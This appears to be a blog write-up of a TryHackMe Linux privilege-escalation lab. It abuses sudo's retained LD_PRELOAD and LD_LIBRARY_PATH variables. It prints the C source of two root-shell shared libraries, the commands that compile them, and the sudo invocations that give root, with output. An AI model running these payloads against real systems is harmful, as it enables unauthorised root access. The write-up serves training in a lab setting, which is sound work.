![[TryHackMe] Privilege escalation using the environment variables LD_PRELOAD and LD_LIBRARY_PATH! Linux PrivEsc Writepu Part 4](https://hack-lab-256.com/wp-content/uploads/2023/03/hack-lab-256-samnail-8.jpg)
This time, we will try escalating privileges using the LINUX environment variables "LD_PRELOAD" and "LD_LIBRARY_PATH".
The target machine uses the Room below of TryHackMe.
"TryHackMe-Linux PrivEsc: https://tryhackme.com/room/linuxprivesc "
This article is part 4.
If you would like to check Writeup for Linux PrivEsc with TryHackMe, please also check Privilege Elevation Using GTFOBins
Pochip
Pochip
Pochip
Pochip
Preparation
First, start the target machine and connect it to the target machine.
Starting the target machine
First, start the target machine.
Join "TryHackMe-Linux PrivEsc: https://tryhackme.com/room/linuxprivesc
If IP Address is displayed like this, booting is OK.
SSH connection
Connect to the target machine you started using SSH.
As explained, it's OK as long as you can connect using "user:password321".
└─$ ssh user@10.10.6.35 The authenticity of host '10.10.6.35 (10.10.6.35)' can't be established. DSA key fingerprint is SHA256:p2NSsfvYJVk1Qe0tsNX5G2h8AaWYRn71jdz3uEodbMA. This key is not known by any other names Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '10.10.6.35' (DSA) to the list of known hosts. user@10.10.6.35's password: Linux debian 2.6.32-5-amd64 #1 SMP Tue May 13 16:34:35 UTC 2014 x86_64 The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Fri May 15 06:41:23 2020 from 192.168.1.125 user@debian:~$ sudo -l Matching Defaults entries for user on this host: env_reset, env_keep+=LD_PRELOAD, env_keep+=LD_LIBRARY_PATH"-oHostKeyAlgorithms=+ssh-rsa" must be added
Elevation of Privilege using environment variables
The vulnerable environment variables are "LD_PRELOAD" and "LD_LIBRARY_PATH".
A brief explanation is as follows:
- LD_PRELOAD: Used to preload libraries. By specifying a shared library, it is possible to load (or execute) the shared library before executing any program.
- LD_LIBRARY_PATH: Specifies the list in which the shared libraries are searched. By specifying the directory where the library file is located, that directory can also be searched.
Elevation of Privilege using LD_PRELOAD
Now, I'll try using "LD_PRELOAD" to obtain root privileges.
First, check which programs can be run with sudo.
You can see that 11 programs can be run with sodu.
user@debian:~$ sudo -l Matching Defaults entries for user on this host: env_reset, env_keep+=LD_PRELOAD, env_keep+=LD_LIBRARY_PATH User user may run the following commands on this host: (root) NOPASSWD: /usr/sbin/iftop (root) NOPASSWD: /usr/bin/find (root) NOPASSWD: /usr/bin/nano (root) NOPASSWD: /usr/bin/vim (root) NOPASSWD: /usr/bin/man (root) NOPASSWD: /usr/bin/awk (root) NOPASSWD: /usr/bin/less (root) NOPASSWD: /usr/bin/ftp (root) NOPASSWD: /usr/bin/nmap (root) NOPASSWD: /usr/sbin/apache2 (root) NOPASSWD: /bin/moreWe will create a shared library that will be loaded in advance.
However, I think there will be "preload.c" on the target machine in advance, so I'll compile it.
It appears that preload.c is a program that runs a system call and generates a "/bin/bash" shell.
user@debian:~$ cat /home/user/tools/sudo/preload.c #include<stdio.h> #include<sys/types.h> #include<stdlib.h> void _init() { unsetenv("LD_PRELOAD"); setresuid(0,0,0); system("/bin/bash -p"); }Generate the shared library from preload.c.
user@debian:~$ gcc -fPIC -shared -nostartfiles -o /tmp/preload.so /home/user/tools/sudo/preload.cOnce you have created it, when running a program that can be executed with sudo, specify LD_PRELOAD and run it.
user@debian:~$ sudo LD_PRELOAD=/tmp/preload.so find root@debian:/home/user# whoami rootYou've been able to become a root user.
Elevation of Privilege using LD_LIBRARY_PATH
Next, we will also try escalating privileges using "LD_LIBRARY_PATH".
First, run the command "ldd" to apache2 to display dependencies on shared libraries to check the shared libraries.
user@debian:~$ ldd /usr/sbin/apache2 linux-vdso.so.1 => (0x00007fff84ee8000) libpcre.so.3 => /lib/x86_64-linux-gnu/libpcre.so.3 (0x00007fba94c5c000) libaprutil-1.so.0 => /usr/lib/libaprutil-1.so.0 (0x00007fba94a38000) libaprutil-1.so.0 => /usr/lib/libaprutil-1.so.0 (0x00007fba94a38000) libaprutil-1.so.0 => /usr/lib/libaprutil-1.so.0 (0x00007fba947fe000) libpthread.so.0 => /lib/libpthread.so.0 (0x00007fba945e2000) libc.so.6 => /lib/libc.so.6 (0x00007fba94276000) libuuid.so.1 => /lib/libuuid.so.1 (0x00007fba94071000) libt.so.1 => /lib/libt.so.1 (0x00007fba93e69000) libcrypt.so.1 => /lib/libcrypt.so.1 (0x00007fba93c32000) libdl.so.2 => /lib/libdl.so.2 (0x00007fba93a2d000) libexpat.so.1 => /usr/lib/libexpat.so.1 (0x00007fba93805000) /lib64/ld-linux-x86-64.so.2 (0x00007fba95119000)There are a few dependencies, but this time we'll create the same shared library as "libcrypt.so.1" and try to load it.
First, let's create a shared library.
The contents of "library_path.c" are as follows:
What you're doing is no different from before.
user@debian:~$ cat /home/user/tools/sudo/library_path.c #include<stdio.h> #include<stdlib.h> static void hijack() __attribute__((constructor)); void hijack() { unsetenv("LD_LIBRARY_PATH"); setresuid(0,0,0); system("/bin/bash -p"); }
Create a shared library named "libcrypt.so.1" from "library_path.c" above.
The storage location is "/tmp".
user@debian:~$ gcc -o /tmp/libcrypt.so.1 -shared -fPIC /home/user/tools/sudo/library_path.cWhen running apache2 with sudo, specify the "/tmp" stored earlier in LD_LIBRARY_PATH.
user@debian:~$ sudo LD_LIBRARY_PATH=/tmp apache2 apache2: /tmp/libcrypt.so.1: no version information available (required by /usr/lib/libaprutil-1.so.0) root@debian:/home/user# whoami rootI think this has allowed root to escalate privileges!
summary
This time, I tried escalating privileges using the LINUX environment variables "LD_PRELOAD" and "LD_LIBRARY_PATH".
The content was that by generating /bin/bash shell and running it with sudo, you can get the root shell, but I wonder if this is possible. . . I was simply interested.
References and Sites
Medium( Shamsher khan ): https://infosecwriteups.com/linux-privesc-tryhackme-writeup-bf4e32460ee5
![[HackTheBox] What to do if "An error of type HTTPClient::ReceiveTimeoutError happened, message is executed expired" appears in Evil-WinRM](https://hack-lab-256.com/wp-content/uploads/2023/09/hack-lab-256-samnail-4-300x169.jpg)
![[CVE-2015-3306] I enumerated the shared Samba, manipulate a vulnerable version of proftpd, and escalated privileges by manipulating path variables! TryHackMe Kenobi Writeup](https://hack-lab-256.com/wp-content/uploads/2023/08/hack-lab-256-samnail-2-300x169.jpg)
![[Permanent CTF for beginners] setodaNote CTF WEB Writeup! Recommended for getting a sense of CTF!](https://hack-lab-256.com/wp-content/uploads/2023/08/hack-lab-256-samnail-1-1-300x169.jpg)
![[TryHackMe] We conducted packet analysis using wireshark to investigate the intrusion of ssh-backdoor! Overpass2 Writeup](https://hack-lab-256.com/wp-content/uploads/2023/08/hack-lab-256-samnail-300x169.jpg)
![[CVE-2018-16763] fuel CMS 1.4.1 - I converted Remote Code Execution (1) to python 3 and hacked it! TryHackMe Ignite Writeup](https://hack-lab-256.com/wp-content/uploads/2023/08/hack-lab-256-samnail-25-300x169.jpg)
![[TryHackMe] I used SSH2John to extract the hash from the private key and hacked the password with John the Ripper! Overpass Writeup](https://hack-lab-256.com/wp-content/uploads/2023/07/hack-lab-256-samnail-24-300x169.jpg)
![[TryHackMe] I tried infiltrating a Windows machine with a ret2esp attack (Buffer Overflow)! Brainstorm Writeup](https://hack-lab-256.com/wp-content/uploads/2023/06/hack-lab-256-samnail-23-300x169.jpg)